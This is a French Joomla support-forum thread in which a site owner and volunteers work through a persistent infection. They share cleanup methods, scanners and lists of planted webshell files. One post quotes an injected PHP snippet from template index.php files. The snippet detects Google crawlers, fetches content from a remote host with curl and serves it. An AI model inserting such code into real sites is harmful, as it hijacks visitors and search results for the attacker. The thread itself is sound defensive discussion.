Site vérolé depuis plusieurs semaines

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] Site vérolé depuis plusieurs semaines

    Bonjour,

    Tout est dans le titre :-)
    Le site http://mjcrunning.fr/ est fonctionnel depuis de nombreuses années et sert surtout de forum Kunena pour un club.

    Avant d'en arriver à ce forum Joomla, j'ai épuisé mes connaissances sur le sujet en sachant que je n'ai pas de sauvegarde d'avant la vérole:

    - J'ai changé tous les mots de passe ftp, superuser etc... sans mettre le même
    - J'ai tenté de mettre les .htaccess et index.php de la racine en 404
    - J'ai réinstallé Joomla qui est toujours à jour sérieusement.
    - Je supprime le contenu des répertoires cache et de tmp
    - j'ai lancé des programmes de scan qui ne détectent rien qui ne m'interpellent.
    - je supprime bien évidement tous ce qui est bidouillé par le scrip malsain

    Et au final, il y a toujours un script qui parvient à tourner et à:
    - Ecraser le .htaccess de la racine
    - Ajouter du code au début du index.php de la racine
    - Ajouter un répertoire WP-admin sur la racine
    - Ajouter un fichier wp-load.php à la racine
    - Bidouiller les répertoires cache et tmp
    - Sous www\components\com_users\models, à ajouter blogking.php+leyeuts.php

    J'ai beau lui faire la peau , je n'arrive pas à identifier et empecher ce script de se lancer ou de bloquer des fichiers en modification.

    Merci pour votre aide!


    Dernière édition par unmick___ à 19/02/2020, 16h37

  • #2
    Bonjour et bienvenue,

    Est-ce que vous êtes seul sur cet hébergement ?

    Lorsque cela se produit,
    - je monte un environnement en local (uwamp ou wampserver)
    - je fais une sauvegarde via AkeebaBackup,
    - je rapatrie en local et je lance kickstart d'akeeba
    - avant de finir la restauration, je lance un coup d'antivirus Windows
    - j'installe sur un autre répertoire une copie propre Joomla avec les composants que j'utilise en dernière version,
    - je compare avec winmerge les 2 répertoires et cela donne en général de bons résultats

    Il reste :
    - le problème du répertoire images qui est souvent l'endroit où se cache les virus (faux fichiers image, fichiers php ou html,...)
    - le contenu de la base de données qui peut contenir des saletés dans les messages ou les articles

    Pascal
    If anything can go wrong, it will...
    If I can help, I will ..https://conseilgouz.com

    JoomlaDays, 2 et 3 Octobre. Plus d'infos sur https://www.joomladay.fr

    Commentaire


    • #3
      En cherchant à décrire mon souci, j'ai trouvé un bout de code en entete des index.php des trois themes présents qui me paraissent plus que suspicieux .
      je viens de les inhiber mais pour le partage de connaissance :

      $botbotbot = "...".mb_strtolower($_SERVER[HTTP_USER_AGENT]);$botbotbot = str_replace(" ", "-", $botbotbot);if (strpos($botbotbot,"google")){$ch = curl_init(); $xxx = sqrt(30976); curl_setopt($ch, CURLOPT_URL, "http://$xxx.xx.xxx.xx/cakes/?useragent=$botbotbot&domain=$_SERVER[HTTP_HOST]"); $result = curl_exec($ch); curl_close ($ch); echo $result;}

      Dernière édition par pmleconte à 12/02/2020, 12h32

      Commentaire


      • #4
        D'où proviennent vos templates ?
        If anything can go wrong, it will...
        If I can help, I will ..https://conseilgouz.com

        JoomlaDays, 2 et 3 Octobre. Plus d'infos sur https://www.joomladay.fr

        Commentaire


        • #5
          Je suis sur un hébergement mutualisé.
          Suite à la remarque sur le fichier image, j'ai trouvé trois .ico vraiment pas catholique que j'ai supprimé.

          En template j'ai ashton de www.globbersthemes.com que je n'utilise plus , Quasar de www.rockettheme.com que je n'utilise pas et tx_morph de JoomlArt.com

          Il me reste à checker les articles comme indiqué avant la grande reinstalle/comparaison que je n'ai pas envie de faire :-)

          Je vois déjà demain si ça revient après le nettoyage des index.php des templates et la suppression des .ico

          Merci

          Commentaire


          • #6
            Bonjour,

            Le nettoyage des index ne réglera rien si un script est caché quelque part dans le dossier du site, ce qui est le plus probable, comme dit par Pascal.
            La solution de Pascal est lourde, tu peux aussi ou en plus exécuter aeSecure Quickstart pour rechercher le(s) fautif(s), sachant qu'il faut faire la part des choses entre les fichiers sains où ce quickstart décèle des termes pouvant être indésirables et les vrais indésirables.

            Personnellement, lorsque je ne veux pas perdre de temps, j'installe un site vierge et avec JMigrator j'importe toutes les données "core" du site, les tables des extensions et je réinstalle les extensions pour qu'elles prennent en compte leurs précédentes données.
            Ensuite, il reste le point délicat : avant de les importer, s'assurer que dans le dossier des images il n'y a pas ce script malicieux ; idem si tu as des dossiers spécifiques pour des documents.
            "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
            MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr et sites perso chez PlanetHoster + sites gérés chez PHPNET, 1and1 et OVH

            Commentaire


            • #7
              Merci à vous.
              Ce matin première fois que le script ne s'est pas éxécuté correctement. Il s'execute mais doit être enfin bloqué
              Au niveau des logs, j'ai tout de même des tentatives de connexion régulières de 38.145.70.158
              J'ai aussi un blogking.php qui s'est installé sous www/components/com_users/models

              Je vais gratter ce week-end le site....

              Commentaire


              • #8
                Bonjour

                As-tu testé aeSecure QuickScan, sans nul doute il devrait te permettre d'identifier certains scripts malhonnêtes...

                Bonne journée.
                Christophe (cavo789)
                Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)
                Développeur de marknotes, logiciel de gestion de prises de notes avec interface web et de multiples convertisseur https://github.com/cavo789/marknotes
                Mes logiciels OpenSource : https://www.avonture.be

                Cette anné, le JoomlaDay 2020 FR aura lieu à Bruxelles les 2 et 3 octobre 2020. Plus d'infos sur https://www.joomladay.fr

                Commentaire


                • #9
                  ​​​​Merci.

                  J'ai crié victoire trop vite : La vérole est revenue entre temps.
                  J'avais déjà lancé le aeSecure QuickScan .... Je viens de le réinstaller

                  J'ai beaucoup de Signature : base64_decode mais j'ai du mal à dire si c'est le mal absolu ou si c'est logique ....

                  Mais comment après modif de tous les mots de passe et modification des droits, un script peut passer outre :-) Le truc à devenir dingue.




                  Dernière édition par pmleconte à 13/02/2020, 15h59 Raison: Suppression du lien

                  Commentaire


                  • #10
                    Je viens vite de regarder, je suis ... perplexe. Mon programme dit qu'il a détecté, avec certitude, 20 fichiers malsains mais il n'en fait pas mention. Je vois beaucoup de résultats avec des "fortes probabilités" mais je ne vois pas les 20 fichiers qui sont certains. Étrange...

                    Cela fait maintenant quelques années que j'ai développé QuickScan et il me paraît logique d'avoir une liste des 20 fichiers incriminés... je ne les vois pas dans les résultats. Étonnant.

                    QuickScan est développé de manière totalement bénévole mais je veux bien prendre le temps de regarder pourquoi les 20 fichiers ne sont pas listés. Si cela te convient, pourrais-tu mettre à ma disposition une copie de ton site (je n'ai besoin que des fichiers; pas de la base de données; une simple archive ZIP avec les fichiers ferait l'affaire).

                    Si cela te convient, je pourrais alors lancer QuickScan sur ma machine et améliorer l'outil. Comprends bien que je ne vais pas nettoyer ton site; juste l'utiliser pour accroître l'efficacité du script. A toi de voir du coup Envoie-moi un message privé si tu souhaites que je te communique mon email.

                    >components/com_config/controller/modules/cancel.php

                    Très simplement parce que le virus serait toujours présent. Dans l'hypothèse où le virus est déjà là, quand quelqu'un accès à tonsite/image/virus.php, il exécute le virus. Que les mots de passe aient été modifié; peu importe; le script se lance dans le contexte du site Joomla (et donc avec les droits de Joomla).

                    Bonne journée.


                    Christophe (cavo789)
                    Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)
                    Développeur de marknotes, logiciel de gestion de prises de notes avec interface web et de multiples convertisseur https://github.com/cavo789/marknotes
                    Mes logiciels OpenSource : https://www.avonture.be

                    Cette anné, le JoomlaDay 2020 FR aura lieu à Bruxelles les 2 et 3 octobre 2020. Plus d'infos sur https://www.joomladay.fr

                    Commentaire


                    • #11
                      Bonjour,

                      Je m'immisce : vous avez oublié de supprimer QuickScan, donc, j'ai supprimé le lien.

                      Pascal
                      If anything can go wrong, it will...
                      If I can help, I will ..https://conseilgouz.com

                      JoomlaDays, 2 et 3 Octobre. Plus d'infos sur https://www.joomladay.fr

                      Commentaire


                      • #12
                        Bonjour,

                        Je viens de faire le nettoyage!

                        Merci

                        Mick

                        Commentaire


                        • #13
                          Très rapide coup d'oeil entre deux cuissons :

                          Virus
                          media\com_finder\css\ajax-setAdvancedSettings.php.suspected
                          media\jui\css\shell-render.php.suspected
                          images\ugafajkb.php
                          images\phocagallery\swe.php.suspected
                          components\com_users\views\registration\5e3154360a dd8.php
                          components\com_content\helpers\ajax-setAdvancedSettings.php.suspected

                          Fichier natif de Joomla mais vérolé
                          includes\framework.php


                          Cette liste n'est absolument pas exhaustive
                          Christophe (cavo789)
                          Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)
                          Développeur de marknotes, logiciel de gestion de prises de notes avec interface web et de multiples convertisseur https://github.com/cavo789/marknotes
                          Mes logiciels OpenSource : https://www.avonture.be

                          Cette anné, le JoomlaDay 2020 FR aura lieu à Bruxelles les 2 et 3 octobre 2020. Plus d'infos sur https://www.joomladay.fr

                          Commentaire


                          • #14
                            Bonsoir,

                            Un seul fichier restant avec du code vérolé, et le site est toujours vulnérable.
                            Il faut mettre le site hors ligne le temps du nettoyage ou le hacker / robot risque de modifier en même temps les fichiers (ou en ajouter de nouveau).

                            Même après cela, il va falloir trouver par où est entré le hacker ou tous les efforts ne serviront à rien...

                            Cordialement,
                            Chabi01 - http://www.xlformation.com

                            Commentaire


                            • #15

                              Re,

                              Quelques autres fichiers vérolés (liste non exhaustive)

                              * administrator\components\com_phocagallery\librarie s\phocagallery\facebook\fbsystem.php
                              * administrator\components\com_uddeim\admin.usersett ings.php
                              * administrator\components\com_categories\sudpfnce.p hp
                              * administrator\components\com_templates\abulzhce.ph p
                              * administrator\components\com_users\views\fxwdlvlx. php
                              * components\com_content\helpers\ajax-setAdvancedSettings.php.suspected
                              * components\com_users\models\new_side.php
                              * components\com_users\models\leyeuts.php
                              * components\com_config\controller\modules\wenscvya. php
                              * components\com_newsfeeds\views\category\axzflpgx.p hp
                              * components\com_users\views\registration\5e3154360a dd8.php
                              * images\ugafajkb.php
                              * images\phocagallery\swe.php.suspected
                              * media\com_finder\css\ajax-setAdvancedSettings.php.suspected
                              * media\jui\css\shell-render.php.suspected
                              * templates\rt_quasar\language\newsfeed-render.php
                              * templates\ashton\index.php
                              * plugins\editors\none\shell-render.php.suspected
                              * plugins\installer\folderinstaller\lvnpvlud.php
                              * libraries\fof\render\newsfeed-render.php
                              * libraries\joomla\database\query\zlbrucfd.php
                              * libraries\src\pdrizjmt.php

                              aeSecure QuickScan va les détecter dorénavant; je viens de mettre les fichiers de signatures à jour à l'instant (https://github.com/cavo789/aesecure_quickscan).

                              Deux autres remarques:

                              * ton template ashton a toujours mootools d'actif (mootools a disparu au profit de jquery). La version de mootools que tu as date de 2006 (wow!!!)
                              * uddeIm serait encore en version 3.1 (cette version date de 2013, n'aurais-tu pas oublié quelques mises-à-jour?)

                              Note : cet exemple me donne une fois encore l'occasion de répéter le mantra suivant: il n'est pas possible de nettoyer un site à la main; sans outil. Les virus peuvent se cacher partout; même dans une image (une fausse gif), un faux robots.txt, ... Il existe quantité de moyens de dissimuler des virus et de rendre exécutable des fichiers qui ne le sont pas (au travers du .htaccess). J'ai déjà vu des virus qui se cachent dans plusieurs fois à la manière d'un puzzle et un script qui collecte les pièces pour exécuter la bestiole.

                              Quand un site est vérolé; le mieux est toujours de récupérer un backup sain ou d'utiliser des techniques complètes comme celles évoquées par différentes personnes sur ce forum. Chercher les virus en regardant "juste armé de ses yeux" ici et là, dans tel ou tel dossier, n'est juste pas possible. On peut trouver des fichiers, oui (un fichier .php dans le dossier images est obligatoirement suspect) mais un code vérolé qui a été ajouté dans un fichier à priori sain (le fameux includes\framework.php est un parfait exemple); ça, c'est impossible sans un outil dédicacé.

                              Bonne soirée et bon nettoyage...

                              Christophe
                              Christophe (cavo789)
                              Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)
                              Développeur de marknotes, logiciel de gestion de prises de notes avec interface web et de multiples convertisseur https://github.com/cavo789/marknotes
                              Mes logiciels OpenSource : https://www.avonture.be

                              Cette anné, le JoomlaDay 2020 FR aura lieu à Bruxelles les 2 et 3 octobre 2020. Plus d'infos sur https://www.joomladay.fr

                              Commentaire

                              Annonce

                              Réduire
                              1 sur 2 < >

                              C'est [Réglé] et on n'en parle plus ?

                              A quoi ça sert ?
                              La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

                              Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

                              Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
                              Comment ajouter la mention [Réglé] à votre discussion ?
                              1 - Aller sur votre discussion et éditer votre premier message :


                              2 - Cliquer sur la liste déroulante Préfixe.

                              3 - Choisir le préfixe [Réglé].


                              4 - Et voilà… votre discussion est désormais identifiée comme réglée.

                              2 sur 2 < >

                              Assistance au forum - Outil de publication d'infos de votre site

                              Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

                              Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

                              Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

                              UTILISER À VOS PROPRES RISQUES :
                              L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

                              Problèmes connus :
                              FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

                              Installation :

                              1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

                              Archive zip : https://github.com/AFUJ/FPA/zipball/master

                              2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

                              3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

                              4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

                              5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

                              6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
                              et remplacer www. votresite .com par votre nom de domaine


                              Exemples:
                              Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/
                              Pour executer le script: http://www..com/fpa-fr.php

                              Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/cms/
                              Pour executer le script: http://www..com/cms/fpa-fr.php

                              En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

                              Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
                              Voir plus
                              Voir moins

                              Partenaire de l'association

                              Réduire

                              Hébergeur Web PlanetHoster
                              Travaille ...
                              X